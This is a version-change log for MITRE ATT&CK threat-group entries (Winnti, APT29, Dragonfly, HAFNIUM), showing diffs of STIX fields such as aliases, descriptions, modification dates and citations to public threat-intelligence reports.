external_references[4]['description']Tarakanov, D. (2015, June 22). Games are over: Winnti is now targeting pharmaceutical companies. Retrieved January 14, 2016.Hegel, T. (2018, May 3). Burning Umbrella: An Intelligence Report on the Winnti Umbrella and Associated State-Sponsored Attackers. Retrieved July 8, 2018.
external_references[4]['url']https://securelist.com/games-are-over/70991/https://401trg.github.io/pages/burning-umbrella.html
external_references[5]['source_name']Novetta Winnti April 2015Kaspersky Winnti April 2013
external_references[5]['description']Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017.Kaspersky Lab's Global Research and Analysis Team. (2013, April 11). Winnti. More than just a game. Retrieved February 8, 2017.
external_references[5]['url']http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdfhttps://securelist.com/winnti-more-than-just-a-game/37029/
external_references[6]['source_name']401 TRG Winnti Umbrella May 2018Novetta Winnti April 2015
external_references[6]['description']Hegel, T. (2018, May 3). Burning Umbrella: An Intelligence Report on the Winnti Umbrella and Associated State-Sponsored Attackers. Retrieved July 8, 2018.Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017.
external_references[6]['url']https://401trg.github.io/pages/burning-umbrella.htmlhttp://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf
external_references[7]['source_name']Symantec Suckfly March 2016Kaspersky Winnti June 2015
external_references[7]['description']DiMaggio, J.. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016.Tarakanov, D. (2015, June 22). Games are over: Winnti is now targeting pharmaceutical companies. Retrieved January 14, 2016.
external_references[7]['url']http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificateshttps://securelist.com/games-are-over/70991/
x_mitre_version1.11.2
Other Version Changes

[G0016] APT29

Current version: 3.1

Version changed from: 2.1 → 3.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/
external_referenceshttps://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services
values_changed
STIX FieldOld valueNew Value
modified2021-10-16 00:59:58.792000+00:002022-07-11 20:34:55.717000+00:00
external_references[1]['source_name']APT29CozyDuke
external_references[1]['description'](Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Crowdstrike DNC June 2016)
external_references[2]['source_name']NobleBaronCozy Bear
external_references[2]['description'](Citation: SentinelOne NobleBaron June 2021)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: CrowdStrike StellarParticle January 2022)
external_references[3]['source_name']Dark HaloStellarParticle
external_references[3]['description'](Citation: Volexity SolarWinds)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: CrowdStrike StellarParticle January 2022)
external_references[4]['source_name']StellarParticleThe Dukes
external_references[4]['description'](Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)
external_references[5]['source_name']NOBELIUMAPT29
external_references[5]['description'](Citation: MSTIC NOBELIUM Mar 2021)(Citation: MSTIC NOBELIUM May 2021)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: MSRC Nobelium June 2021)(Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)
external_references[8]['source_name']The DukesNOBELIUM
external_references[8]['description'](Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: MSTIC NOBELIUM May 2021)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: MSRC Nobelium June 2021)
external_references[9]['source_name']Cozy BearIRON HEMLOCK
external_references[9]['description'](Citation: Crowdstrike DNC June 2016)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Secureworks IRON HEMLOCK Profile)
external_references[10]['source_name']CozyDukeIRON RITUAL
external_references[10]['description'](Citation: Crowdstrike DNC June 2016)(Citation: Secureworks IRON RITUAL Profile)
external_references[11]['source_name']White House Imposing Costs RU Gov April 2021NobleBaron
external_references[11]['description']White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. Retrieved April 16, 2021.(Citation: SentinelOne NobleBaron June 2021)
external_references[12]['source_name']UK Gov Malign RIS Activity April 2021Dark Halo
external_references[12]['description']UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services . Retrieved April 16, 2021.(Citation: Volexity SolarWinds)
external_references[13]['source_name']F-Secure The DukesCrowdstrike DNC June 2016
external_references[13]['description']F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
external_references[13]['url']https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdfhttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
external_references[14]['source_name']GRIZZLY STEPPE JARVolexity SolarWinds
external_references[14]['description']Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.
external_references[14]['url']https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdfhttps://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/
external_references[15]['source_name']Crowdstrike DNC June 2016CrowdStrike SUNSPOT Implant January 2021
external_references[15]['description']Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021.
external_references[15]['url']https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/
external_references[16]['source_name']UK Gov UK Exposes Russia SolarWinds April 2021CrowdStrike StellarParticle January 2022
external_references[16]['description']UK Gov. (2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise . Retrieved April 16, 2021.CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.
external_references[16]['url']https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromisehttps://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/
external_references[17]['source_name']NSA Joint Advisory SVR SolarWinds April 2021GRIZZLY STEPPE JAR
external_references[17]['description']NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021.Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.
external_references[17]['url']https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDFhttps://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf
external_references[18]['source_name']UK NSCS Russia SolarWinds April 2021FireEye APT29 Nov 2018
external_references[18]['description']UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021.Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.
external_references[18]['url']https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromisehttps://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html
external_references[19]['source_name']FireEye SUNBURST Backdoor December 2020F-Secure The Dukes
external_references[19]['description']FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.
external_references[19]['url']https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.htmlhttps://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf
external_references[20]['source_name']MSTIC NOBELIUM Mar 2021ESET Dukes October 2019
external_references[20]['description']Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.
external_references[20]['url']https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf
external_references[21]['source_name']CrowdStrike SUNSPOT Implant January 2021FireEye SUNBURST Backdoor December 2020
external_references[21]['description']CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021.FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.
external_references[21]['url']https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
external_references[22]['source_name']Volexity SolarWindsSentinelOne NobleBaron June 2021
external_references[22]['description']Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021.
external_references[22]['url']https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/
external_references[23]['source_name']Cybersecurity Advisory SVR TTP May 2021Microsoft Unidentified Dec 2018
external_references[23]['description']NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021.Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.
external_references[23]['url']https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdfhttps://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/
external_references[24]['source_name']FireEye APT29 Nov 2018MSTIC NOBELIUM May 2021
external_references[24]['description']Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.
external_references[24]['url']https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.htmlhttps://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
external_references[25]['source_name']ESET Dukes October 2019MSRC Nobelium June 2021
external_references[25]['description']Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.MSRC. (2021, June 25). New Nobelium activity. Retrieved August 4, 2021.
external_references[25]['url']https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdfhttps://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/
external_references[26]['source_name']NCSC APT29 July 2020MSTIC Nobelium Toolset May 2021
external_references[26]['description']National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.
external_references[26]['url']https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdfhttps://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/
external_references[27]['source_name']SentinelOne NobleBaron June 2021MSTIC NOBELIUM Mar 2021
external_references[27]['description']Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021.Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.
external_references[27]['url']https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
external_references[28]['source_name']MSTIC NOBELIUM May 2021NCSC APT29 July 2020
external_references[28]['description']Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.
external_references[28]['url']https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf
external_references[29]['source_name']MSTIC Nobelium Toolset May 2021Cybersecurity Advisory SVR TTP May 2021
external_references[29]['description']MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021.
external_references[29]['url']https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf
external_references[30]['source_name']MSRC Nobelium June 2021NSA Joint Advisory SVR SolarWinds April 2021
external_references[30]['description']MSRC. (2021, June 25). New Nobelium activity. Retrieved August 4, 2021.NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021.
external_references[30]['url']https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF
external_references[31]['source_name']Microsoft Unidentified Dec 2018Secureworks IRON HEMLOCK Profile
external_references[31]['description']Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.Secureworks CTU. (n.d.). IRON HEMLOCK. Retrieved February 22, 2022.
external_references[31]['url']https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/http://www.secureworks.com/research/threat-profiles/iron-hemlock
x_mitre_version2.13.1
iterable_item_added
STIX FieldOld valueNew Value
aliasesIRON RITUAL
aliasesIRON HEMLOCK
external_references{'source_name': 'Secureworks IRON RITUAL Profile', 'description': 'Secureworks CTU. (n.d.). IRON RITUAL. Retrieved February 24, 2022.', 'url': 'https://www.secureworks.com/research/threat-profiles/iron-ritual'}
external_references{'source_name': 'UK Gov Malign RIS Activity April 2021', 'description': 'UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services . Retrieved April 16, 2021.', 'url': 'https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services'}
external_references{'source_name': 'UK Gov UK Exposes Russia SolarWinds April 2021', 'description': 'UK Gov. (2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise . Retrieved April 16, 2021.', 'url': 'https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise'}
external_references{'source_name': 'UK NSCS Russia SolarWinds April 2021', 'description': 'UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021.', 'url': 'https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise'}
external_references{'source_name': 'White House Imposing Costs RU Gov April 2021', 'description': 'White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. Retrieved April 16, 2021.', 'url': 'https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/'}

[G0035] Dragonfly

Current version: 3.1

Version changed from: 2.1 → 3.1


Old Description
New Description
t1[Dragonfly](https://attack.mitre.org/groups/G0035) is a cybet1[Dragonfly](https://attack.mitre.org/groups/G0035) is a cybe
>r espionage group that has been active since at least 2011. >r espionage group that has been attributed to Russia's Feder
>They initially targeted defense and aviation companies but s>al Security Service (FSB) Center 16.(Citation: DOJ Russia Ta
>hifted to focus to include the energy sector in early 2013. >rgeting Critical Infrastructure March 2022)(Citation: UK GOV
>They have also targeted companies related to industrial cont> FSB Factsheet April 2022) Active since at least 2010, [Drag
>rol systems. (Citation: Symantec Dragonfly)(Citation: Secure>onfly](https://attack.mitre.org/groups/G0035) has targeted d
>works IRON LIBERTY July 2019)  A similar group emerged in 20>efense and aviation companies, government entities, companie
>15 and was identified by Symantec as [Dragonfly 2.0](https:/>s related to industrial control systems, and critical infras
>/attack.mitre.org/groups/G0074). There is debate over the ex>tructure sectors worldwide through supply chain, spearphishi
>tent of the overlap between [Dragonfly](https://attack.mitre>ng, and drive-by compromise attacks.(Citation: Symantec Drag
>.org/groups/G0035) and [Dragonfly 2.0](https://attack.mitre.>onfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citatio
>org/groups/G0074), but there is sufficient evidence to lead >n: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly
>to these being tracked as two separate groups. (Citation: Sy> 2.0 Sept 2017)(Citation: Gigamon Berserk Bear October 2021)
>mantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 >(Citation: CISA AA20-296A Berserk Bear December 2020)(Citati
>Sept 2017)(Citation: Dragos DYMALLOY )>on: Symantec Dragonfly 2.0 October 2017)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Dragos Threat Intelligence']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttp://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf
external_referenceshttps://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector
external_referenceshttps://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group
values_changed
STIX FieldOld valueNew Value
modified2021-10-12 22:07:18.072000+00:002022-10-19 22:09:02.443000+00:00
description[Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been active since at least 2011. They initially targeted defense and aviation companies but shifted to focus to include the energy sector in early 2013. They have also targeted companies related to industrial control systems. (Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019) A similar group emerged in 2015 and was identified by Symantec as [Dragonfly 2.0](https://attack.mitre.org/groups/G0074). There is debate over the extent of the overlap between [Dragonfly](https://attack.mitre.org/groups/G0035) and [Dragonfly 2.0](https://attack.mitre.org/groups/G0074), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY )[Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16.(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) Active since at least 2010, [Dragonfly](https://attack.mitre.org/groups/G0035) has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)(Citation: Symantec Dragonfly 2.0 October 2017)
external_references[1]['source_name']DragonflyDYMALLOY
external_references[1]['description'](Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Dragos DYMALLOY )(Citation: UK GOV FSB Factsheet April 2022)
external_references[2]['source_name']TG-4192Berserk Bear
external_references[2]['description'](Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)
external_references[3]['source_name']Crouching YetiTEMP.Isotope
external_references[3]['description'](Citation: Secureworks IRON LIBERTY July 2019)(Citation: Mandiant Ukraine Cyber Threats January 2022)(Citation: Gigamon Berserk Bear October 2021)
external_references[4]['source_name']IRON LIBERTYCrouching Yeti
external_references[4]['description'](Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)
external_references[5]['source_name']Energetic BearIRON LIBERTY
external_references[5]['description'](Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: UK GOV FSB Factsheet April 2022)
external_references[6]['source_name']Symantec DragonflyTG-4192
external_references[6]['description']Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.(Citation: Secureworks IRON LIBERTY July 2019)(Citation: UK GOV FSB Factsheet April 2022)
external_references[7]['source_name']Secureworks IRON LIBERTY July 2019Dragonfly
external_references[7]['description']Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)
external_references[8]['source_name']Symantec Dragonfly Sept 2017Energetic Bear
external_references[8]['description']Symantec Security Response. (2017, September 6). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)
external_references[9]['source_name']Fortune Dragonfly 2.0 Sept 2017CISA AA20-296A Berserk Bear December 2020
external_references[9]['description']Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018.CISA. (2020, December 1). Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets. Retrieved December 9, 2021.
external_references[9]['url']http://fortune.com/2017/09/06/hack-energy-grid-symantec/https://www.cisa.gov/uscert/ncas/alerts/aa20-296a#revisions
external_references[10]['source_name']Dragos DYMALLOY DOJ Russia Targeting Critical Infrastructure March 2022
external_references[10]['description']Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020.Department of Justice. (2022, March 24). Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide. Retrieved April 5, 2022.
external_references[10]['url']https://www.dragos.com/threat/dymalloy/https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical
external_references[11]['source_name']Secureworks MCMD July 2019Dragos DYMALLOY
external_references[11]['description']Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020.
external_references[11]['url']https://www.secureworks.com/research/mcmd-malware-analysishttps://www.dragos.com/threat/dymalloy/
external_references[12]['source_name']Secureworks Karagany July 2019Fortune Dragonfly 2.0 Sept 2017
external_references[12]['description']Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020.Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018.
external_references[12]['url']https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sectorhttp://fortune.com/2017/09/06/hack-energy-grid-symantec/
x_mitre_version2.13.1
iterable_item_added
STIX FieldOld valueNew Value
aliasesTEMP.Isotope
aliasesDYMALLOY
aliasesBerserk Bear
external_references{'source_name': 'Mandiant Ukraine Cyber Threats January 2022', 'description': 'Hultquist, J. (2022, January 20). Anticipating Cyber Threats as the Ukraine Crisis Escalates. Retrieved January 24, 2022.', 'url': 'https://www.mandiant.com/resources/ukraine-crisis-cyber-threats'}
external_references{'source_name': 'Secureworks MCMD July 2019', 'description': 'Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.', 'url': 'https://www.secureworks.com/research/mcmd-malware-analysis'}
external_references{'source_name': 'Secureworks IRON LIBERTY July 2019', 'description': 'Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020.', 'url': 'https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector'}
external_references{'source_name': 'Secureworks Karagany July 2019', 'description': 'Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020.', 'url': 'https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector'}
external_references{'source_name': 'Gigamon Berserk Bear October 2021', 'description': 'Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE’S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021.', 'url': 'https://vblocalhost.com/uploads/VB2021-Slowik.pdf'}
external_references{'source_name': 'Symantec Dragonfly Sept 2017', 'description': 'Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.', 'url': 'https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers'}
external_references{'source_name': 'Symantec Dragonfly', 'description': 'Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.', 'url': 'https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments'}
external_references{'source_name': 'Symantec Dragonfly 2.0 October 2017', 'description': 'Symantec. (2017, October 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved April 19, 2022.', 'url': 'https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks'}
external_references{'source_name': 'UK GOV FSB Factsheet April 2022', 'description': "UK Gov. (2022, April 5). Russia's FSB malign activity: factsheet. Retrieved April 5, 2022.", 'url': 'https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet'}

[G0125] HAFNIUM

Current version: 1.2

Version changed from: 1.0 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-25 23:43:56.055000+00:002022-07-06 20:05:26.079000+00:00
external_references[2]['source_name']Microsoft HAFNIUM March 2020Volexity Exchange Marauder March 2021
external_references[2]['description']MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021.Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021.
external_references[2]['url']https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
